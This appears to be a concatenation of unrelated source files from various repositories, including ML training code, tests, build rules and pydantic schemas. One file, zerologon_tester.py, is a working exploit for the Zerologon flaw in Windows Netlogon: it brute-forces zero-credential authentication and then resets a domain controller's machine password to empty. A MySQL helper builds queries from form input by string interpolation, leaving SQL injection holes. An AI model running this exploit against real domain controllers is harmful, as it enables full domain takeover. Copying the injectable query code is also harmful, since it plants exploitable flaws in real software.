    plot_model(model, to_file='./data/img/model_lstm.png', show_shapes=True)
    model.summary()
    return model
# Model training.
def model_train(input_shape, filepath, model_save_path):
    """Train the LSTM classifier, save it, and report test-set accuracy."""
    # Split the dataset into training and test sets with a 9:1 ratio.
    # input_shape = 100
    x, y, output_dictionary, vocab_size, label_size, inverse_word_dictionary = load_data(filepath, input_shape)
    train_x, test_x, train_y, test_y = train_test_split(x, y, test_size = 0.1, random_state = 42)
    # Model hyper-parameters; adjust as needed.
    n_units = 100
    batch_size = 32
    epochs = 5
    output_dim = 20
    # Train the model.
    lstm_model = create_LSTM(n_units, input_shape, output_dim, filepath)
    lstm_model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size, verbose=1,callbacks=[tensorboard])
    # Save the model.
    lstm_model.save(model_save_path)
    N = test_x.shape[0]  # number of test samples
    predict = []
    label = []
    # Predict each test sample one at a time and print the outcome.
    for start, end in zip(range(0, N, 1), range(1, N+1, 1)):
        sentence = [inverse_word_dictionary[i] for i in test_x[start] if i != 0]
        y_predict = lstm_model.predict(test_x[start:end])
        label_predict = output_dictionary[np.argmax(y_predict[0])]
        label_true = output_dictionary[np.argmax(test_y[start:end])]
        print(''.join(sentence), label_true, label_predict)  # print prediction result
        predict.append(label_predict)
        label.append(label_true)
    acc = accuracy_score(predict, label)  # prediction accuracy
    print('模型在测试集上的准确率为: %s.' % acc)
if __name__ == '__main__':
    # Train on the 2-class comment dataset with 140-character sequences.
    filepath = './data/comment_trainset_2class.csv'
    input_shape = 140
    model_save_path = './data/lstm/douban_lstm.model'
    model_train(input_shape, filepath, model_save_path)
keyboards/__init__.py | jtprog/gendalf_bot | 2 | 12761493 | from . import default
from . import inline
| 1.171875 | 1 |
src/test/views/test_baseview.py | Odin-SMR/odin-api | 0 | 12761494 | <reponame>Odin-SMR/odin-api
from odinapi.views import baseview
import pytest
def test_inspect_predicate():
    """inspect_predicate accepts a plain (unbound) method."""
    class Dummy:
        def test(self):
            pass

    assert baseview.inspect_predicate(Dummy.test)
def test_inspect_predicate_on_instance():
    """inspect_predicate also accepts a bound method of an instance."""
    class Dummy:
        def test(self):
            pass

    assert baseview.inspect_predicate(Dummy().test)
def test_register_versions():
    """register_versions stamps role and version metadata on the function."""
    class Target:
        @baseview.register_versions('unlucky', ['v42'])
        def t(self):
            pass

    assert Target.t._role == 'unlucky'
    assert Target.t._versions == ['v42']
@pytest.mark.parametrize("role,versions,check_attribute,expect", (
    ('fetch', ['v42'], 'VERSION_TO_FETCHDATA', {'v42': '_tester'}),
    (
        'return', None, 'VERSION_TO_RETURNDATA',
        {'v4': '_tester', 'v5': '_tester'},
    ),
    ('swagger', ['v42'], 'VERSION_TO_SWAGGERSPEC', {'v42': '_tester'}),
))
def test_baseview(role, versions, check_attribute, expect):
    """Registered methods appear in the matching version map on a BaseView."""
    class Ultimate(baseview.BaseView):
        @baseview.register_versions(role, versions)
        def _tester(self):
            pass

    instance = Ultimate()
    assert getattr(instance, check_attribute) == expect
| 2.046875 | 2 |
Submodules/Peano/src/peano/performanceanalysis/merge-log-files.py | annereinarz/ExaHyPE-Workshop-Engine | 2 | 12761495 | import sys
import re
#
# main
#
# NOTE: this is a Python 2 script (print statements).
# Validate command-line arguments: <logfilename> <ranks>.
if len(sys.argv)!=3:
  print "Usage: python merge-log-files.py logfilename ranks"
  print ""
  print "logfilename is the name of the log files without the rank-x- prefix."
  print "ranks is the number of ranks you have used for your simulation. If "
  print "four MPI ranks have been used and you pass in a log file name of "
  print "myfile.log, then the script searches for rank-0-myfile.log, "
  print "rank-1-myfile.log, rank-2-myfile.log and rank-3-myfile.log. "
  print ""
  print "(C) 2015 <NAME>"
  quit()
filenameprefix = sys.argv[1]
ranks = int( sys.argv[2] )
# Open the merged output file and read every per-rank log into memory.
print "open fused output file merged-" + filenameprefix
outputFile = open( "merged-" + filenameprefix, "w" )
inputFiles = []
for rank in range(0,ranks):
  filename = "rank-" + str(rank) + "-" + filenameprefix
  print "read " + filename
  with open(filename) as f:
    inputFiles.append( f.readlines() )
print "read in all " + str(len(inputFiles)) + " input files"
# k-way merge: repeatedly pick the rank whose next line has the smallest
# leading time stamp and append that line to the merged file. Terminates
# when no rank has a parsable line left (timeStamp stays at float max).
timeStamp = 0
while timeStamp<sys.float_info.max:
  timeStamp = sys.float_info.max
  rankWithSmallestTimeStamp = 0
  for rank in range(0,ranks):
    # Leading decimal number of the line is interpreted as the time stamp.
    searchPattern = "([0-9]\.?[0-9]*).*"
    if len(inputFiles[rank])>0:
      firstLineInCurrentFile = inputFiles[rank][0]
      m = re.search( searchPattern, firstLineInCurrentFile )
      if (m):
        currentTimeStamp = float(m.group(1))
        if currentTimeStamp < timeStamp:
          timeStamp = currentTimeStamp
          rankWithSmallestTimeStamp = rank
      else:
        print "ERROR: line in " + str(rank) + "th intput file does not hold time stamp. Line " + firstLineInCurrentFile
  if timeStamp<sys.float_info.max:
    print "- t=" + "%.4e"%(timeStamp) + ": take message from rank " + str( rankWithSmallestTimeStamp )
    outputFile.write( inputFiles[rankWithSmallestTimeStamp][0] )
    inputFiles[rankWithSmallestTimeStamp].pop(0)
| 2.953125 | 3 |
frankfurt/Server/Models/MySQLdb_WITH_CONN_POOL.py | fcgtyg/SEAS | 1 | 12761496 | # -*-coding:utf-8-*-
from DBTable import DBTable
from mysql.connector import pooling, InterfaceError, OperationalError
from Password import Password
class MySQLdb:
    def __init__(self, db_name, user="root", password="<PASSWORD>"):
        """Create a one-connection MySQL pool for *db_name*.

        NOTE(review): the default password value looks like a redaction
        placeholder, and the host/port are hard-coded -- make these
        configurable before deployment.
        """
        self.name = db_name
        # Extensions accepted for uploaded images.
        self.allowed_extensions = {'png', 'jpg', 'jpeg'}
        db_config = {
            "pool_name": "conn",
            "database": db_name,
            "user": user,
            "password": password,
            "host": '172.16.31.10',
            "port": 3306,
            "pool_size": 1}
        self.pool = pooling.MySQLConnectionPool(**db_config)
        # Active connection/cursor are set in __enter__ and cleared in __exit__.
        self.db = None
        self.cursor = None
def __enter__(self):
self.db = self.pool.get_connection()
self.cursor = self.db.cursor(buffered=True)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.db.close()
self.db = None
self.cursor = None
except OperationalError:
pass
    def initialize_organization(self, organization):
        """Create the schema and all tables for a new *organization*.

        SECURITY NOTE(review): *organization* is interpolated directly into
        DDL statements; it must be validated/whitelisted by the caller
        (identifiers cannot be bound as SQL parameters).
        """
        # Create Database for organization
        self.execute(
            "CREATE SCHEMA %s;" % organization
        )
        # Set active database and Enable Event Scheduler
        self.execute(
            "USE %s; "
            "SET GLOBAL event_scheduler = ON;" % organization
        )
        # Role Table
        # NOTE(review): uniques=[("Role")] is a list containing a plain
        # string, not a 1-tuple -- verify DBTable handles both forms.
        DBTable("roles", [
            ("Role", "varchar(20)", ""),
            ("roleID", "INT", "AUTO_INCREMENT")],
                uniques=[("Role")],
                primary_key="RoleID",
                database=self)
        # Initialize Roles
        self.execute("Insert into roles(Role) values ('superuser'), ('admin'), ('lecturer'), ('student');")
        # Members Table
        DBTable("members", [
            ("PersonID", "int", "not null"),
            ("Role", "int", "not null"),
            ("Name", "varchar(255)", "not null"),
            ("Surname", "varchar(255)", "not null"),
            ("Username", "varchar(255)", "not null"),
            ("Password", "varchar(255)", "not null"),
            ("Email", "varchar(50)", "not null"),
            ("Department", "varchar(255)", ""),
            ("ProfilePic", "varchar(255)", "")],
                primary_key="PersonID",
                foreign_keys_tuple=[("Role", "roles", "RoleID", "")],
                uniques=[("Name", "Surname", "Username"), ("Username")],
                database=self)
        # Courses Table
        DBTable("courses", [
            ("CourseID", "int", "not null auto_increment"),
            ("Name", "varchar(255)", "not null"),
            ("Code", "varchar(20)", "not null"),
            ("isActive", "boolean", "default true")],
                primary_key="CourseID",
                uniques=[("Name", "Code", "isActive")],
                indexes=[("Code")],
                database=self)
        # Registrations Table
        DBTable("registrations", [
            ("StudentID", "int", "not null"),
            ("CourseID", "int", "not null"),
            ("RegistrationID", "int", "auto_increment")],
                foreign_keys_tuple=[
                    ("StudentID", "members", "PersonID", "on delete cascade"),
                    ("courseID", "courses", "CourseID", "on delete cascade")],
                uniques=[
                    ("StudentID", "CourseID")],
                primary_key="RegistrationID",
                database=self)
        # Lecturers Table
        DBTable("lecturers", [
            ("LecturerID", "int", "not null"),
            ("CourseID", "int", "not null"),
            ("LeCorID", "int", "not null auto_increment")],
                foreign_keys_tuple=[
                    ("LecturerID", "members", "PersonID", "on delete cascade"),
                    ("CourseID", "courses", "CourseID", "on delete cascade")],
                primary_key="LeCorID",
                uniques=[
                    ("LecturerID, CourseID")],
                database=self)
        # Exams Table
        DBTable("exams", [
            ("ExamID", "int", "auto_increment"),
            ("Name", "varchar(255)", "not null"),
            ("CourseID", "int", ""),
            ("Time", "Varchar(50)", "not null"),
            ("Duration", "int", "not null"),
            ("Status", "varchar(20)", "not null Default 'draft'")],
                primary_key="ExamID",
                foreign_keys_tuple=[
                    ("CourseID", "courses", "CourseID", "on delete set null")],
                uniques=[
                    ("Name"),
                    ("Name", "Time")],
                database=self)
        # Questions Table
        DBTable("questions", [
            ("QuestionID", "int", "auto_increment"),
            ("ExamID", "int", ""),
            ("info", "JSON", "")],
                primary_key="QuestionID",
                foreign_keys_tuple=[
                    ("ExamID", "exams", "ExamID", "on delete set null")],
                database=self)
        # Answers Table
        DBTable("answers", [
            ("answerID", "int", "auto_increment"),
            ("questionID", "int", "not null"),
            ("studentID", "int", "not null"),
            ("answer", "JSON", ""),
            ("grade", "int", "")],
                primary_key="answerID",
                foreign_keys_tuple=[
                    ("questionID", "questions", "questionID", "on delete cascade"),
                    ("studentID", "members", "PersonID", "on delete cascade")],
                uniques=[
                    ("questionID", "studentID")],
                database=self)
        # Temporary Passwords Table
        # NOTE(review): "<PASSWORD>)" below looks like a redaction artifact
        # (stray parenthesis) -- verify the intended column type.
        DBTable("temporary_passwords", [
            ("UserID", "int", ""),
            ("Password", "<PASSWORD>)", "not null")],
                primary_key="UserID",
                foreign_keys_tuple=[
                    ("UserID", "members", "PersonID", "on delete cascade")],
                database=self)
        return "Done"
    def get_organization(self):
        """Return all member rows from the hard-coded istanbul_sehir_university schema."""
        return self.execute("Select * from istanbul_sehir_university.members")
    def sign_up_user(self, organization, request):
        """Insert a new member row built from the registration *request* form.

        SECURITY NOTE(review): form values are string-interpolated directly
        into the SQL statement -- this is injectable; switch to parameterized
        queries (requires extending ``execute`` to accept bind parameters).
        """
        passwd = Password().hash_password(request.form["Password"])
        username = request.form["Username"]
        role = request.form["Role"].lower()
        # The Role name is resolved to its numeric RoleID via a lookup query.
        command = "Insert into %s.members(PersonID, Role, Name, Surname, Username, Password, Email, Department) " \
                  "values(%s, '%d', '%s', '%s', '%s', '%s', '%s', '%s')" \
                  % (organization,
                     request.form["ID"],
                     int(self.execute("SELECT RoleID FROM %s.roles WHERE Role = '%s'" % (
                         organization, role))[0][0]),
                     request.form["Name"],
                     request.form["Surname"],
                     username,
                     passwd,
                     request.form["Email"],
                     request.form["Department"]
                     )
        return self.execute(command)
    def if_token_revoked(self, token):
        """Return True if *token* is present in main.revoked_tokens.

        Lookup failures (InterfaceError/TypeError) are treated as
        "not revoked" -- a deliberate fail-open; review whether that is
        acceptable for your threat model.
        SECURITY NOTE(review): the token is string-interpolated into the SQL.
        """
        try:
            result = self.execute("select token from main.revoked_tokens where token = '%s'" % token)
            return len(result) > 0
        except InterfaceError:
            return False
        except TypeError:
            return False
    def revoke_token(self, token):
        """Record *token* in main.revoked_tokens so it can no longer be used."""
        return self.execute("INSERT INTO main.revoked_tokens (token) VALUES ('%s');" % token)
    def log_activity(self, username, ip, endpoint, desc=None):
        """Append an audit row to last_activities, with an optional description."""
        if desc is None:
            self.execute(
                "INSERT INTO last_activities(Username, IP, Api_Endpoint) VALUES ('%s', '%s', '%s');"
                % (username, ip, endpoint))
        else:
            self.execute(
                "INSERT INTO last_activities(Username, IP, Api_Endpoint, Description) VALUES ('%s', '%s', '%s', '%s');"
                % (username, ip, endpoint, desc))
    def execute(self, command):
        """Run *command*; return fetched rows for SELECTs, else None.

        Falls back to multi-statement execution when the connector raises
        InterfaceError (e.g. for scripts containing several statements).
        NOTE: this file uses Python 2 print-statement syntax below.
        """
        try:
            self.cursor.execute(command)
        except InterfaceError:
            # Retry assuming a multi-statement command string.
            self.cursor.execute(command, multi=True)
        if command.lower().startswith("select") or command.lower().startswith("(select"):
            rtn = self.cursor.fetchall()
            self.__commit()
            return rtn
        try:
            self.__commit()
        except InterfaceError:
            # Multi-statement commands must be consumed iteratively before
            # the commit can succeed.
            for result in self.db.cmd_query_iter(command):
                print "cmd_query_iter: ", result
                self.__commit()
        return None
        # try:
        #     rtn = self.cursor.fetchall()
        # except InterfaceError:
        #     print "Interface error 2"
        #     rtn = None
        # self.__commit()
        # return rtn
    def __commit(self):
        """Commit the current transaction on the active connection."""
        return self.db.commit()
| 2.5625 | 3 |
closure/buildozer_http_archive.bzl | mirandacong/rules_proto | 0 | 12761497 |
load("@bazel_tools//tools/build_defs/repo:utils.bzl", "workspace_and_buildfile")
def _http_archive_impl(ctx):
"""Buildozer implementation of the http_archive rule."""
if not ctx.attr.url and not ctx.attr.urls:
fail("At least one of url and urls must be provided")
if ctx.attr.build_file and ctx.attr.build_file_content:
fail("Only one of build_file and build_file_content can be provided.")
all_urls = []
if ctx.attr.urls:
all_urls = ctx.attr.urls
if ctx.attr.url:
all_urls = [ctx.attr.url] + all_urls
ctx.download_and_extract(
all_urls,
"",
ctx.attr.sha256,
ctx.attr.type,
ctx.attr.strip_prefix,
)
if ctx.os.name == "mac os x":
buildozer_urls = [ctx.attr.buildozer_mac_url]
buildozer_sha256 = ctx.attr.buildozer_mac_sha256
else:
buildozer_urls = [ctx.attr.buildozer_linux_url]
buildozer_sha256 = ctx.attr.buildozer_linux_sha256
ctx.download(
buildozer_urls,
output = "buildozer",
sha256 = buildozer_sha256,
executable = True,
)
if ctx.attr.label_list:
args = ["./buildozer", "-root_dir", ctx.path(".")]
args += ["replace deps %s %s" % (k, v) for k, v in ctx.attr.replace_deps.items()]
args += ctx.attr.label_list
result = ctx.execute(args, quiet = False)
if result.return_code:
fail("Buildozer failed: %s" % result.stderr)
if ctx.attr.sed_replacements:
sed = ctx.which("sed")
if not sed:
fail("sed utility not found")
# For each file (dict key) in the target list...
for filename, replacements in ctx.attr.sed_replacements.items():
# And each sed replacement to make (dict value)...
for replacement in replacements:
args = [sed, "-i.bak", replacement, filename]
# execute the replace on that file.
result = ctx.execute(args, quiet = False)
if result.return_code:
fail("Buildozer failed: %s" % result.stderr)
workspace_and_buildfile(ctx)
_http_archive_attrs = {
"url": attr.string(),
"urls": attr.string_list(),
"sha256": attr.string(),
"strip_prefix": attr.string(),
"type": attr.string(),
"build_file": attr.label(allow_single_file = True),
"build_file_content": attr.string(),
"replace_deps": attr.string_dict(),
"sed_replacements": attr.string_list_dict(),
"label_list": attr.string_list(),
"workspace_file": attr.label(allow_single_file = True),
"workspace_file_content": attr.string(),
"buildozer_linux_url": attr.string(
default = "https://github.com/bazelbuild/buildtools/releases/download/0.15.0/buildozer",
),
"buildozer_linux_sha256": attr.string(
default = "be07a37307759c68696c989058b3446390dd6e8aa6fdca6f44f04ae3c37212c5",
),
"buildozer_mac_url": attr.string(
default = "https://github.com/bazelbuild/buildtools/releases/download/0.15.0/buildozer.osx",
),
"buildozer_mac_sha256": attr.string(
default = "294357ff92e7bb36c62f964ecb90e935312671f5a41a7a9f2d77d8d0d4bd217d",
),
}
buildozer_http_archive = repository_rule(
implementation = _http_archive_impl,
attrs = _http_archive_attrs,
)
"""
http_archive implementation that applies buildozer and sed replacements in the
downloaded archive.
Refer to documentation of the typical the http_archive rule in http.bzl. This
rule lacks the patch functionality of the original.
Following download and extraction of the archive, this rule will:
1. Execute a single buildozer command.
2. Execute a list of sed commands.
The buildozer command is constructed from the `replace_deps` and `label_list`
attributes. For each A -> B mapping in the replace_deps dict, a command like
'replace deps A B' will be appended. The list of labels to match are taken from
the label_list attribute. Refer to buildozer documentation for an explanation
of the replace deps command.
The sed commands are constructed from the `sed_replacements` attribute. These
sed commands might not be necessary if buildozer was capable of replacement
within *.bzl files, but currently it cannot. This attribute is a
string_list_dict, meaning the dict keys are filename to modify (in place), and
each dict value is are list of sed commands to apply onto that file. The value
typically looks something like 's|A|B|g'.
"""
| 2.140625 | 2 |
src/adobe/pdfservices/operation/internal/api/dto/document.py | hvntravel/pdfservices-python-sdk | 2 | 12761498 | # Copyright 2021 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
class Document:
json_hint = {
'dc_format' : 'dc:format',
'location' : 'cpf:location',
}
def __init__(self, file_format= None, location= None):
self.dc_format = file_format
self.location = location
| 2.171875 | 2 |
src/BackgroundSet.py | kwal0203/data_generator | 0 | 12761499 | import os
from src.Background import Background
from PIL import Image
class BackgroundSet:
    """Represents the whole set of background images in the application."""

    def __init__(self, directory):
        """:param directory: path of the folder holding the background images."""
        self.directory = directory
        self.number_of_backgrounds = 0
        self.background_images = []

    def make_background_set(self):
        """Open every file in the directory and wrap it in a Background."""
        for filename in os.listdir(self.directory):
            # BUG FIX: use os.path.join instead of raw string concatenation,
            # which produced a wrong path whenever `directory` lacked a
            # trailing separator.
            image_path = os.path.join(self.directory, filename)
            open_image = Background(filename, Image.open(image_path, 'r'))
            self.background_images.append(open_image)
            self.number_of_backgrounds += 1
| 3.328125 | 3 |
retinanet/dataloader_style.py | JulesSanchez/pytorch-retinanet | 1 | 12761500 | <reponame>JulesSanchez/pytorch-retinanet
import torch
from torch.utils import data
import numpy as np
class StyleDataset(data.Dataset):
    """Torch dataset pairing raw samples with labels converted to tensors."""

    def __init__(self, train_data, train_labels):
        self.train_data = train_data
        self.train_labels = train_labels

    def __getitem__(self, index):
        """Return (sample, label) with the label as a torch tensor."""
        sample = self.train_data[index]
        label_tensor = torch.from_numpy(np.array(self.train_labels[index]))
        return sample, label_tensor

    def __len__(self):
        return len(self.train_data)
| 2.5625 | 3 |
src/airfly/_vendor/airflow/contrib/operators/gcp_text_to_speech_operator.py | ryanchao2012/airfly | 7 | 12761501 | <reponame>ryanchao2012/airfly<filename>src/airfly/_vendor/airflow/contrib/operators/gcp_text_to_speech_operator.py
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.providers.google.cloud.operators.text_to_speech import (
CloudTextToSpeechSynthesizeOperator,
)
class GcpTextToSpeechSynthesizeOperator(CloudTextToSpeechSynthesizeOperator):
    """Alias of CloudTextToSpeechSynthesizeOperator, presumably kept for the
    legacy contrib import path. Auto-generated file -- do not edit by hand."""
    pass
| 1.46875 | 1 |
setup.py | Atharva-Gundawar/Commit-Man | 0 | 12761502 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import io
import os
import sys
from setuptools import find_packages, setup, Command
# Package meta-data.
# NOTE(review): EMAIL/AUTHOR look like redaction placeholders -- fill in
# before publishing.
NAME = 'Commit-Man'
DESCRIPTION = 'Official Commit man python package'
URL = 'https://github.com/atharva-Gundawar/commit-man'
EMAIL = '<EMAIL>'
AUTHOR = '<NAME>'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.3'
# NOTE(review): "datetime" is part of the standard library; listing it in
# install_requires is almost certainly unnecessary.
REQUIRED = [
    "datetime", "gitignore_parser", "docopt"
]
here = os.path.abspath(os.path.dirname(__file__))
# Use README.md as the long description, falling back to DESCRIPTION when
# the file is absent (e.g. building from an sdist without it).
try:
    with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
        long_description = '\n' + f.read()
except FileNotFoundError:
    long_description = DESCRIPTION
# The version is hard-coded in VERSION above (no __version__.py is loaded).
setup(
    name=NAME,
    version=VERSION,
    description=DESCRIPTION,
    long_description=long_description,
    long_description_content_type='text/markdown',
    author=AUTHOR,
    author_email=EMAIL,
    python_requires=REQUIRES_PYTHON,
    url=URL,
    packages=find_packages(),
    # package_dir={'simplepipreqs':
    #              'simplepipreqs'},
    entry_points ={
        'console_scripts': [
            'cm = src.main:main'
        ]
    },
    include_package_data=True,
    install_requires=REQUIRED,
    keywords = 'git commit version-control-system vcs',
    zip_safe = False,
    license='MIT',
    classifiers=[
        # Trove classifiers
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy',
        "Operating System :: OS Independent",
    ]
)
app_folder/schemas/user.py | Nuznhy/day-f-hack | 0 | 12761503 | <reponame>Nuznhy/day-f-hack
import uuid
from datetime import datetime
import re
from fastapi.responses import JSONResponse
from pydantic import BaseModel, ValidationError, validator, Field
from typing import Optional
class UserBase(BaseModel):
    """Common base schema: every user payload carries an email address."""
    email: str
class UserLoginIn(UserBase):
    """Login request body: email (from UserBase) plus plaintext password."""
    password: str

    class Config:
        schema_extra = {
            'example': {
                'email': 'email',
                'password': 'password'
            }
        }
class Token(BaseModel):
    """Successful authentication response carrying the access token."""
    access_token: str
    token_type: str
    success: bool
class TokenData(BaseModel):
    """Decoded token payload; email may be absent in malformed tokens."""
    email: Optional[str] = None
class UserRegisterIn(BaseModel):
    """Registration payload with validation of username, password and email."""
    email: str
    username: str
    password: str
    job: str
    first_name: Optional[str]
    last_name: Optional[str]
    image: Optional[str]

    @validator('username')
    def check_username(cls, value: str):
        """Reject usernames containing spaces."""
        if ' ' in value:
            raise ValueError('must not have spaces')
        return value

    @validator('password')
    def validate_password(cls, value: str):
        """Require 8-64 alphanumeric characters including at least one digit
        and one capital letter.

        BUG FIX: the previous check enforced only length and character set,
        although the error message promised a digit and a capital letter.
        """
        if (not re.fullmatch(r'[A-Za-z0-9]{8,64}', value)
                or not re.search(r'[0-9]', value)
                or not re.search(r'[A-Z]', value)):
            raise ValueError('password must has at least 8 symbols, number and capital')
        return value

    @validator('email')
    def validate_email(cls, value: str):
        """Minimal sanity check: no spaces and an '@' must be present."""
        if ' ' in value or '@' not in value:
            raise ValueError('not valid email')
        return value
class UserRegisterOut(BaseModel):
    """Registration response: success flag plus a freshly issued token."""
    success: bool
    access_token: str
    token_type: str

    class Config:
        schema_extra = {
            'example': {
                'success': True,
                'access_token': 'token',
                'token_type': 'Bearer',
            }
        }
class UserDataOut(BaseModel):
    """Public user profile returned by user-data endpoints."""
    id: int
    username: str
    email: str
    job: str
    first_name: Optional[str] = None
    last_name: Optional[str] = None
    # Presumably a base64 data-URI, per the example below — TODO confirm.
    image: Optional[str] = None
    # Unix timestamp (float), despite the example saying 'int'.
    registration_date: float
    class Config:
        # NOTE(review): this example looks copied from the registration
        # payload — it includes 'password', which is not a field of this
        # model, and omits id/email; consider fixing the example.
        schema_extra = {
            'example': {
                'username': 'username',
                'password': 'password',
                'job': 'student',
                'first_name': 'Name',
                'last_name': 'Surname',
                'image': 'data:image/png;base64,blalblalba',
                'registration_date:': 'int'
            }
        }
class FailResponse(BaseModel):
    """Generic error response: success flag plus a human-readable message."""
    success: bool
    message: str
| 2.5625 | 3 |
zerologon_tester.py | tothi/CVE-2020-1472 | 4 | 12761504 | <filename>zerologon_tester.py
#!/usr/bin/env python3
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
from termcolor import colored, cprint
# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be necessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
def fail(msg):
    """Print *msg* plus a generic hint to stderr, then exit with status 2."""
    for line in (msg, 'This might have been caused by invalid arguments or network issues.'):
        print(line, file=sys.stderr)
    sys.exit(2)
def try_zero_authenticate(dc_handle, dc_ip, target_computer):
    """Attempt one Netlogon authentication with an all-zero credential.

    Returns the bound RPC connection on success, None when the DC rejects
    the attempt with STATUS_ACCESS_DENIED, and aborts via fail() on any
    other error.
    """
    # Connect to the DC's Netlogon service.
    binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
    rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
    rpc_con.connect()
    rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
    # Use an all-zero challenge and credential.
    plaintext = b'\x00' * 8
    ciphertext = b'\x00' * 8
    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
    flags = 0x212fffff
    # Send challenge and authentication request.
    nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
    try:
        server_auth = nrpc.hNetrServerAuthenticate3(
            rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            target_computer + '\x00', ciphertext, flags
        )
        # It worked!
        assert server_auth['ErrorCode'] == 0
        return rpc_con
    except nrpc.DCERPCSessionError as ex:
        # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
        if ex.get_error_code() == 0xc0000022:
            return None
        else:
            fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
    except BaseException as ex:
        fail(f'Unexpected error: {ex}.')
def perform_attack(dc_handle, dc_ip, target_computer):
    """Repeatedly call try_zero_authenticate until it succeeds (or
    MAX_ATTEMPTS is reached), then attempt the password reset via
    NetrServerPasswordSet2. Exits with status 1 when the target resists."""
    # Keep authenticating until successful. Expected average number of attempts needed: 256.
    print('Performing authentication attempts...')
    rpc_con = None
    for attempt in range(0, MAX_ATTEMPTS):
        rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
        if rpc_con == None:
            print('=', end='', flush=True)
        else:
            break
    if rpc_con:
        print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
        print('Trying to set empty password for DC computer password.')
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81
        # use latest impacket: credits goes to @_dirkjan https://github.com/SecureAuthCorp/impacket/pull/951
        nrpc_Authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        nrpc_Authenticator["Credential"] = b'\x00' * 8 # same as ciphertext
        nrpc_Authenticator["Timestamp"] = 0
        nrpc_Password = nrpc.NL_TRUST_PASSWORD()
        nrpc_Password['Buffer'] = b'\x00' * 516
        nrpc_Password['Length'] = '\x00' * 4
        request = nrpc.NetrServerPasswordSet2()
        request['PrimaryName'] = target_computer + '\x00'
        request['AccountName'] = target_computer + '$\x00'
        request['ComputerName'] = target_computer + '\x00'
        request['Authenticator'] = nrpc_Authenticator
        # NOTE(review): '<PASSWORD>' below is a redaction placeholder left in
        # the published source — this line is not valid Python as-is, so the
        # file will not run in its current form.
        request['ClearNewPassword'] = <PASSWORD>
        request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        req = rpc_con.request(request)
        print("Success")
    else:
        print('\nAttack failed. Target is probably patched.')
        sys.exit(1)
if __name__ == '__main__':
    # Expect: script name, dc-name, dc-ip (argv length 3). NOTE(review): the
    # check also admits a 4th argument, but the unpacking below only handles
    # exactly 3 elements and would raise ValueError with 4.
    if not (3 <= len(sys.argv) <= 4):
        print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
        print('Exploits(!!!) a domain controller vulnerable to the Zerologon attack.')
        print()
        print('Tester script and technical writeup by <NAME> (Secura).')
        print()
        cprint('Resets DC computer password to empty one. Uses MS-NRPC NetrServerPasswordSet2.', 'white', 'on_red')
        print()
        print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
        sys.exit(1)
    else:
        [_, dc_name, dc_ip] = sys.argv
        # Strip a trailing '$' so a machine-account name also works.
        dc_name = dc_name.rstrip('$')
        perform_attack('\\\\' + dc_name, dc_ip, dc_name)
| 2.0625 | 2 |
tests/test_unit_parser.py | paulculmsee/opennem | 22 | 12761505 | <gh_stars>10-100
import pytest
from opennem.core.unit_parser import parse_unit_duid, parse_unit_number
class TestUnitParser(object):
    """Unit tests for parse_unit_number().

    Fix: the class previously defined two methods both named
    test_returns_string_one; the second definition silently shadowed the
    first, so the '1' case was never executed. The second has been renamed
    test_returns_string_two.
    """
    # Simple
    def test_returns_string_one(self):
        subj = parse_unit_number("1")
        assert subj.id == 1, "Returns string 1 as unit number 1"
        assert subj.number == 1, "Unit has one unit"
    def test_returns_string_two(self):
        subj = parse_unit_number("2")
        assert subj.id == 2, "Has unit id of 2"
        assert subj.number == 1, "Unit has one unit"
    def test_returns_int_one(self):
        subj = parse_unit_number(1)
        assert subj.id == 1, "Returns int 1 as unit number 1"
        assert subj.number == 1, "Unit has one unit"
    def test_returns_string_one_padded(self):
        subj = parse_unit_number(" 1 ")
        assert subj.id == 1, "Returns string 1 as unit number 1"
        assert subj.number == 1, "Unit has one unit"
    def test_blank_unit_number(self):
        subj = parse_unit_number("")
        assert subj.id == 1, "Returns string 1 as unit number 1"
        assert subj.number == 1, "Unit has one unit"
    def test_none_unit_number(self):
        subj = parse_unit_number(None)
        assert subj.id == 1, "Returns string 1 as unit number 1"
        assert subj.number == 1, "Unit has one unit"
    # Ranges
    def test_simple_range(self):
        subj = parse_unit_number("1-2")
